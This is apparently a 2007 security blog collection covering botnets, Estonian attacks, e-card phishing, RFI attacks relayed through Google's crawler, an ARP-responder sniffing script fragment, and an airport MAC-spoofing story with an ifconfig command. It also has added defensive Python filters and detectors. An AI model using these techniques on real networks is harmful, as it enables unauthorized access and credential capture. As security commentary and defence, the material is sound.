eWeek: Estonian Cyber-War Highlights Civilian Vulnerabilities

i posted a column on eweek on what critical infrastructure means, looking back at the estonia incident.

they edited out some of what i had to say on home computers and their impact as a critical infrastructure, but hey, word limitations.


Gadi Evron,


Ecards and email filtering

in the past two weeks, ecards became a major threat.

ecards (or electronic greeting cards) were always a perfect social engineering scheme, open for abuse. with the storm worm and massive exploitation, i believe it has become prudent to filter out all ecard messages in your email systems.

further, some training or awareness information on this subject distributed to your organizations could be very useful.
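The advice above is a mail-gateway policy; here is what it looks like as code. This is an added example, not from the post or any product it mentions: a Python classifier that quarantines e-card-worded mail (the post's blanket rule), with a looser mode that only acts when the card link points at a bare IP address or an executable download. The phrase list, the link heuristics and both sample messages are constructed for the example.

```python
import email
import re
from email import policy
from ipaddress import ip_address

# Heuristics are assumptions for this example, not rules from the post:
# greeting-card wording in subject or body, and links whose host is a bare
# IP address or whose path is an executable download.
ECARD_PHRASES = ("ecard", "e-card", "greeting card", "postcard",
                 "you have received a card", "you've received a card")
RISKY_SUFFIXES = (".exe", ".scr", ".pif")
URL_RE = re.compile(r"https?://([^/\s\"'<>]+)(/[^\s\"'<>]*)?", re.I)


def _message_text(msg):
    """Concatenate every text/plain and text/html part of the message."""
    chunks = []
    for part in msg.walk():
        if part.get_content_type() in ("text/plain", "text/html"):
            chunks.append(part.get_content())
    return "\n".join(chunks)


def classify_ecard(raw, strict=True):
    """Return (action, reasons) for one raw RFC 2822 message.

    strict=True follows the post: every e-card-worded message is quarantined.
    strict=False quarantines only e-card mail whose links look like malware
    delivery (bare-IP host or executable path).
    """
    msg = email.message_from_bytes(raw, policy=policy.default)
    subject = str(msg.get("Subject", "") or "")
    body = _message_text(msg)
    haystack = (subject + "\n" + body).lower()

    reasons = []
    if any(phrase in haystack for phrase in ECARD_PHRASES):
        reasons.append("ecard-wording")
    for host, path in URL_RE.findall(body):
        host = host.split("@")[-1].split(":")[0]   # drop userinfo and port
        try:
            ip_address(host)
            reasons.append("link-to-bare-ip:" + host)
        except ValueError:
            pass                                    # hostname, not an address
        if path and path.lower().rstrip("/").endswith(RISKY_SUFFIXES):
            reasons.append("link-to-executable:" + path)

    risky_link = any(r.startswith("link-to-") for r in reasons)
    if "ecard-wording" in reasons and (strict or risky_link):
        return "quarantine", reasons
    return "deliver", reasons


# Constructed sample messages (not real captures).
STORM_STYLE_LURE = b"""\
From: greetings@example.net
To: victim@example.org
Subject: You've received a greeting card from a family member!

Hello, a friend has sent you an ecard. View it here:
http://192.0.2.10/ecard.exe
"""

NEWSLETTER = b"""\
From: news@example.com
To: victim@example.org
Subject: Weekly product update

Read this week's notes at https://www.example.com/notes/2007-07
"""

if __name__ == "__main__":
    for raw in (STORM_STYLE_LURE, NEWSLETTER):
        print(classify_ecard(raw))
```

The two modes are the trade-off the post implies: the strict mode loses legitimate cards from real greeting sites, the loose mode lets through a lure that links to a hostname rather than an address, so whichever is chosen, the reasons list should be logged so the policy can be tuned.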

gadi evron,


Alternative Botnet C&Cs – free chapter from Botnets: The Killer Web App

syngress was kind enough to allow me to post the chapter i wrote for botnets: the killer web application here as a free sample.

it is the third chapter in the book, and requires some prior knowledge of what a botnet c&c (command and control) is. it is basic, short, and to my belief covers quite a bit. it had to be short, as i had just 5 days to write it while doing other things, and not planning on any writing, but it is pretty good in my completely unbiased opinion. ;)

you can download it from this link:

for the full book, you would need to spend the cash.


gadi evron,


The attacks on Estonia by Russians (or Russia?)

people have been wondering why i’ve been keeping quiet on this issue, especially since i was right there helping out.

a lot of people had information to share and emotions to get out of the way. also, it was really not my place to reply on this – with all the work done by the estonians, my contributions were secondary. mr. alexander harrowell discussed this with me off mailing lists, and our discussions are public on his blog. information from bill woodcock on nanog was also sound.

as to what actually happened over there, more information should become available soon and i will send it here. i keep getting stuck when trying to write the post-mortem and attack/defense analysis as i keep hitting a stone wall i did not expect: strategy. suggestions for the future are also a part of that document, so i will speed it up with a more down-to-earth technical analysis (which is what i promised cert-ee).

in the past i’ve been able to consider information warfare as a part of a larger strategy, utilizing it as a weapon. i was able to think of impact and tools, not to mention (mostly) disconnected attacks and defenses.

i keep seeing strategy for the use in information warfare battles as i write this document on what happened in estonia, and i believe i need more time to explore this against my previous take on the issue, as well as take a look at some classics such as clausewitz, as posh as it may sound.


gadi evron,


Targeted or not targeted?

many of us have been having discussions and arguments over whether the recent bbb phishing attacks are targeted or not.

thinking on this, i believe the better equivalent which may solve our terminology disagreements on whether these bbb phishing emails were targeted or not would be “targeted spam” as a tried concept. we can assume, although in some cases incorrectly, that spam is bulk.

usually, spam goes to “lists” of addresses, harvested. sometimes it is targeted to a certain audience. but there are other types of lists, not just of addresses and interests.

it is possible to buy lists of addresses of people who attended rsa and visited booths, for example. or any other number of trade-shows. it is possible to harvest linkedin, etc.

my take is that this attack is targeted in the sense that it goes to certain individual types only, but is quite mundane and bulk in the type.

we need terms for individual/close-to attacks and attacks by targeting an audience, still in bulk.

gadi evron,


Hacker OpSec and the State Department

Dave Aitel sent this one in, and it’s a good one:


A Botted Fortune 500 a Day

support intelligence releases daily reports on different fortune 500 companies which are heavily affected by the botnet problem, with many compromised machines on their networks.

you can find more information on their blog:

they are good people, and they know botnets.

gadi evron,


Al-Qaeda’s planned attack in London – that’s why we need CPNI

The recent Times Online report Al-Qaeda plot to bring down UK internet shows that massive terrorism operations are being prepared still. The target was the headquarters of Telehouse Europe located in Docklands, London.


The discovery led Eliza Manningham-Buller, head of MI5, to set up the Centre for the Protection of National Infrastructure last month. It is a special MI5 unit…

There are several Internet Exchange Points in London, but we don’t know if this was the only target being planned.

What CPNI? The unit was founded on 1st February and there is no NISCC (National Infrastructure Security Co-ordination Centre) any more.

It appears that Telehouse Docklands has detailed Building Specifications listed at their Main page(!).


Botnets: a retrospective to 2006, and where we are headed in 2007

a few months back i released a post on where i think anti-botnets technology is heading. now it’s time for what happened in 2006, and what we can expect from here on.

i am not a believer in such retrospective looks, as often, they are completely biased and based on what we have seen and what we want to see. this is why i will try and limit myself to what we know happens and is likely to get attention, as well as what we have seen tried by bad guys, which is working for them enough to take to the next level.

what changed with botnets in 2006:

1. botnets reached a level where it is unclear today what parts of the internet are not compromised to an extent. count by clean rather than infected.
2. botnets have become the most significant platform from which virtually any type of online attack and crime is launched. botnets equal an online infrastructure for abusive or criminal activity online.
3. in the past year, botnets have become mainstream. from a non-existent field even in the professional realm up to a few years ago, while attacks were happening constantly regardless, it has turned into the main buzzword and occupation of the security industry today, directly and indirectly.
4. websites have returned to being one of the most significant forms of infection for building botnets, which hadn’t been the case since the late 90s.
5. botnets have become the moving force behind organized crime online, with a low-risk high-profit calculation.
6. new technologies are finally being introduced, moving the botnet controllers from using just (or mainly) irc to more advanced c&c (command and control) channels such as p2p, or multi-layered, such as dns and irc on the osi model.
7. botnets used to be a game of quantity. today, when quantity is assured, quality is becoming a high concern for botnet controllers, both in type of bot as well as in abilities.

what’s going to happen with botnets in 2007:

botnets won’t change. all will remain the same as it has been for years. awareness however, will increase making the problem appear larger and larger, perhaps approaching its real scale. the bad guys would utilize their infrastructure to get more out of the bots (quality once quantity is here) and be able to do more than just steal cash. maximizing their revenue.

further, more and more attackers unrelated to the botnet controllers will make use of already compromised systems and existing botnets to gain access to networks, to facilitate anything from corporate espionage and intelligence gathering, to shameless and open shows of strength to those who oppose them (think blue security), in the real world as well as the cyber one (which to the mob is one and the same, it’s the income that speaks).

meaning, the existing botnet infrastructure will be utilized both in an open fashion, due to the fact that online miscreants (real-world mob) face virtually no risk, as well as in quiet and secretive uses for third-party intelligence operations.

gadi evron,


Anonymizing RFI Attacks Through Google

google can be utilized to hack into websites – actively exploiting them (not information gathering by the use of “google hacking”, although that is how most of the sites vulnerable to rfi attacks are found).

by placing a url on any web page, google will find it, visit it and then index it. with this mechanism, it is possible to anonymize attacks on third party web sites through google by the use of its crawler.

poc -
a malicious web page is constructed by an attacker, containing a url built like so:
1. third party site uri to attack.
2. file inclusion exploit.
3. second uri containing a malicious php shell.

example url:

google will harvest this url, visit the site using its crawler and index it, meaning it accesses the target site with the url it was provided and exploits it unwittingly for whoever planted it. it’s a feature, not a bug.

this is currently exploited in the wild. for example, try searching google for:

and note, as an example:
which is no longer vulnerable. the %20 seems out of place, but this is how it is shown in the search.

why use a botnet when one can abuse the google crawler, which is allowed on most web sites?

1. this attack was verified on google, but there is no reason why it should not work with other search engines, web crawlers and web spiders.
2. file inclusions seem to tie in well with this attack anonymizer, but there is no reason why other attack types can’t be used in a similar fashion.
3. the feature might also be used to anonymize communication, as a covert channel.
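The defensive consequence of the above is that a request arriving with a search engine's user agent is not automatically benign, so an RFI detector must not exempt crawlers. As an added example, not code from the post or from any product, here is a Python scanner over Apache/nginx combined-format access logs that flags any query parameter whose value is an absolute URL to a host other than the site's own, and records whether the request came through a crawler. The log lines, the crawler user-agent markers and the site hostnames are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
REMOTE_SCHEMES = ("http", "https", "ftp")
# Assumption for this example: substrings that mark a search-engine crawler.
CRAWLER_MARKERS = ("googlebot", "bingbot", "slurp", "yandexbot")


def find_rfi_attempts(lines, own_hosts):
    """Flag requests carrying a query parameter whose value is a URL to a foreign host.

    parse_qsl percent-decodes values, so an encoded "http%3A%2F%2F..." is
    caught the same way as a literal "http://...". Crawler requests are
    reported, not skipped: the crawler is only the relay.
    """
    own = {h.lower() for h in own_hosts}
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue                        # not a combined-format line
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            cand = urlsplit(value.strip())
            if (cand.scheme in REMOTE_SCHEMES and cand.hostname
                    and cand.hostname not in own):
                ua = m.group("ua").lower()
                hits.append({
                    "client": m.group("ip"),
                    "param": name,
                    "remote_host": cand.hostname,
                    "status": int(m.group("status")),
                    "via_crawler": any(k in ua for k in CRAWLER_MARKERS),
                })
    return hits


# Constructed sample log (TEST-NET addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2007:12:00:01 +0000] "GET /index.php?page=http://198.51.100.9/shell.txt? HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '198.51.100.23 - - [10/Jan/2007:12:00:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.24 - - [10/Jan/2007:12:00:03 +0000] "GET /login.php?next=https://www.example.org/account HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Jan/2007:12:00:04 +0000] "GET /index.php?page=http%3A%2F%2F198.51.100.9%2Fshell.txt%3F HTTP/1.1" 404 300 "-" "libwww-perl/5.805"',
]
OWN_HOSTS = ("www.example.org", "example.org")

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG, OWN_HOSTS):
        print(hit)
```

A 200 status on a flagged crawler request is the one to chase first: it says the include may have succeeded, and the attacker's own address never appears in the log, which is exactly the anonymization the post describes. The third sample line shows why the own-host allowlist is needed, since redirect-style parameters legitimately carry URLs.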

noam rathaus.
(with thanks to Sun Shine and lev toger)


Team Evil – Incident #2

Earlier this year, Beyond Security’s beSIRT released an incident response forensic analysis of a defacement attack by Team Evil [Team Evil Incident (Cyber-terrorism defacement analysis and response)].

The PDF itself can be found here:


A follow up is being released today, on a second incident. It follows what Team Evil did, their methodology, and how it changed since the first document was released.

The aim of this document is more to show how such analysis is done, on an educational note. The PDF can be found here:


We hope you find this useful.



Me All – For your wifi pentesting pleasure

Sitting at a security conference in Boston, I wrote down a quick and dirty script that just listens for ARP requests and responds to any such request with … Hey, That is Me ™ :) … The things you can find using that… here is a summary:

1) SNMP community names
2) SMB keypairs (you need to use fakesmb)
3) DNS queries (if you answer them it is even more fun)
4) HTTP requests for odd stuff (once you answered the DNS queries, and have set Apache to answer incoming connections you are all set)

I am sure a lot more can be done… I will leave it to your imagination

# Written by Noam Rathaus, Beyond Security (r)

use strict;
use warnings;
use Net::Pcap;

# interface to capture ARP requests on
my $Interface = "eth1";
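The script above is the attacker's side; the defender's counterpart is noticing a host that answers ARP for addresses it does not own. As an added example, not part of Noam's post or his script, here is a Python pass over tcpdump-style ARP reply lines that reports a single MAC claiming many IP addresses (the "that is me" responder) and an IP claimed by more than one MAC (a real host being impersonated). The capture lines, the MAC addresses and the threshold are constructed for the example.

```python
import re
from collections import defaultdict

# One tcpdump-style ARP reply per line, e.g.
#   12:00:01.000000 ARP, Reply 10.0.0.5 is-at aa:bb:cc:dd:ee:05, length 28
ARP_REPLY_RE = re.compile(
    r"ARP, Reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.I)


def analyze_arp_replies(lines, max_ips_per_mac=2):
    """Return findings as (kind, key, sorted_values) tuples.

    max_ips_per_mac is a tunable assumption: routers with secondary
    addresses or proxy ARP legitimately answer for several IPs.
    """
    ips_by_mac = defaultdict(set)
    macs_by_ip = defaultdict(set)
    for line in lines:
        m = ARP_REPLY_RE.search(line)
        if m is None:
            continue                    # request, or not an ARP line at all
        ip, mac = m.group("ip"), m.group("mac").lower()
        ips_by_mac[mac].add(ip)
        macs_by_ip[ip].add(mac)

    findings = []
    for mac, ips in sorted(ips_by_mac.items()):
        if len(ips) > max_ips_per_mac:
            findings.append(("mac-answers-for-many-ips", mac, sorted(ips)))
    for ip, macs in sorted(macs_by_ip.items()):
        if len(macs) > 1:
            findings.append(("ip-claimed-by-several-macs", ip, sorted(macs)))
    return findings


# Constructed capture: a legitimate gateway and host, then a rogue station
# that replies to every request it hears, including one for the gateway.
SAMPLE_CAPTURE = [
    "12:00:01.000000 ARP, Request who-has 10.0.0.1 tell 10.0.0.5, length 28",
    "12:00:01.000200 ARP, Reply 10.0.0.1 is-at aa:bb:cc:dd:ee:01, length 28",
    "12:00:01.000300 ARP, Reply 10.0.0.1 is-at de:ad:be:ef:00:01, length 28",
    "12:00:02.000000 ARP, Reply 10.0.0.5 is-at aa:bb:cc:dd:ee:05, length 28",
    "12:00:03.000000 ARP, Reply 10.0.0.9 is-at de:ad:be:ef:00:01, length 28",
    "12:00:04.000000 ARP, Reply 10.0.0.77 is-at de:ad:be:ef:00:01, length 28",
    "12:00:05.000000 ARP, Reply 10.0.0.130 is-at de:ad:be:ef:00:01, length 28",
]

if __name__ == "__main__":
    for finding in analyze_arp_replies(SAMPLE_CAPTURE):
        print(finding)
```

The second finding is the more reliable one on a real network: a gateway address suddenly answered by two different MACs is what tools such as arpwatch alert on, while the per-MAC count needs an allowlist for routers and virtualization hosts before it is useful.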


DLP on the rise: McAfee buys Israeli startup Onigma for $15-25 million

according to this new article at haaretz, mcafee bought israeli startup onigma for 15 to 25 million usd.

onigma is a company working on dlp (data leakage prevention). according to the article by raphael fogel, mcafee will work to integrate this technology in their enterprise security solution, as well as recruit more developers to establish an r&d center in israel.

“the technology enables the company to monitor all its workers and ensure they do not send confidential information beyond the enterprise boundaries, whether via internet or external memory storage devices.”

dlp is a growing field with many startup competitors. i am not at all sure how effective this technology is, but it comes as an answer to growing concerns in many organizations to protect against sensitive information leaking out.

how this field will develop is indeed interesting, and this buy by mcafee may possibly indicate dlp becoming the new buzzword which anti virus vendors will use to advance their solutions.

whether this technology is successful or not, we are going to hear a lot more about it. the buy is interesting on its own, and it will also be interesting to see what other companies knee-jerk now to buy a foothold in this growing field (whether by the merit of the technology or by the lack of other solutions).

gadi evron,


USB Attacks Going Commercial?

in the public hacking world, so far we have mostly seen usb technology from security vendors… not the attackers’ side.

a few years ago we had discussions on pen-test, and later bugtraq and fd on these risks, following an article in 2600 and a post from me on the risks digest. on pen-test, harlan carvey and others also followed up. since then there have been multiple threads everywhere. this was not new back then, either, imo.

back then i mainly addressed the risk of driver attacks (now more acknowledged since blackhat 2005 and blackhat 2006 presentations on the subject appeared), and didn’t get much attention. hackers did not know usb technology that well and most did not see what the heck drivers had to do with it.

what did come up were the risks of autorun technology (which is a simple solution to making usb devices execute code). these were not as easy as they first appeared, and did not work if windows xp’s screen saver was active. still, things were interesting and my fav quote of: the janitor is the richest person in the organization, got some interest.

today, with several usb buffer overflows discovered (mostly in the linux kernel) and driver attacks getting more attention, i came across the following blog entry by xavier ashe.

in his blog he discusses a usb autorun technology which is actually a hacking tool, (more…)


ATM hack

dd had a nice post today by halvar on an atm fraud:

according to a nathan landon, who provided more details:

they showed it on the news here in virginia. they have security camera footage of the guy who they believe is the perpetrator trying to pull out $250 and getting $1000. he did this twice apparently. he doesn’t look like the “engineer” type. they reported that he was able to turn on the glitch through a series of entered numbers. doubtful he knew what he was doing otherwise he could have turned it off between attempts. (more…)


Wireless not working? go Wired

I arrived at Ataturk Airport (for those who don’t know, it’s located in Turkey), and found out their Wireless network is worth … wait it … shit … You can hardly get a signal. I stood near the Free Wireless Access(tm) sign and got less than 15% signal. Frustrated, I decided to go the extra mile.

The Turks are really nice, they provide Internet access points to people sitting in the travelers lounge, and these Internet access points are connected via Ethernet. I decided to give it a shot and plugged my laptop into the socket… damn, nothing … they must have a sophisticated IDS/IPS/ACL/NOC/[Insert buzzword] device blocking me. Not yet ready to lose the war… was I at war? :) … I decided to issue this command:
ifconfig eth0 hw ether XX:XX:XX:XX:XX:XX

Where I replaced the XX:XX:XX:XX:XX:XX with the MAC address of the Internet access point which I sniffed using Wireshark ™ – known in the past as Ethereal – and voilà, “free” Ethernet based access to the network… though wired :(

I am sure the guys at the security department were telling jokes, think of the poor bastard that will plug his laptop in and see that it won’t work … mohahaa…, but hey, I guess you need to get smarter, MAC addresses are no means of detecting the remote computer’s identity :)

That is it for now. C’ya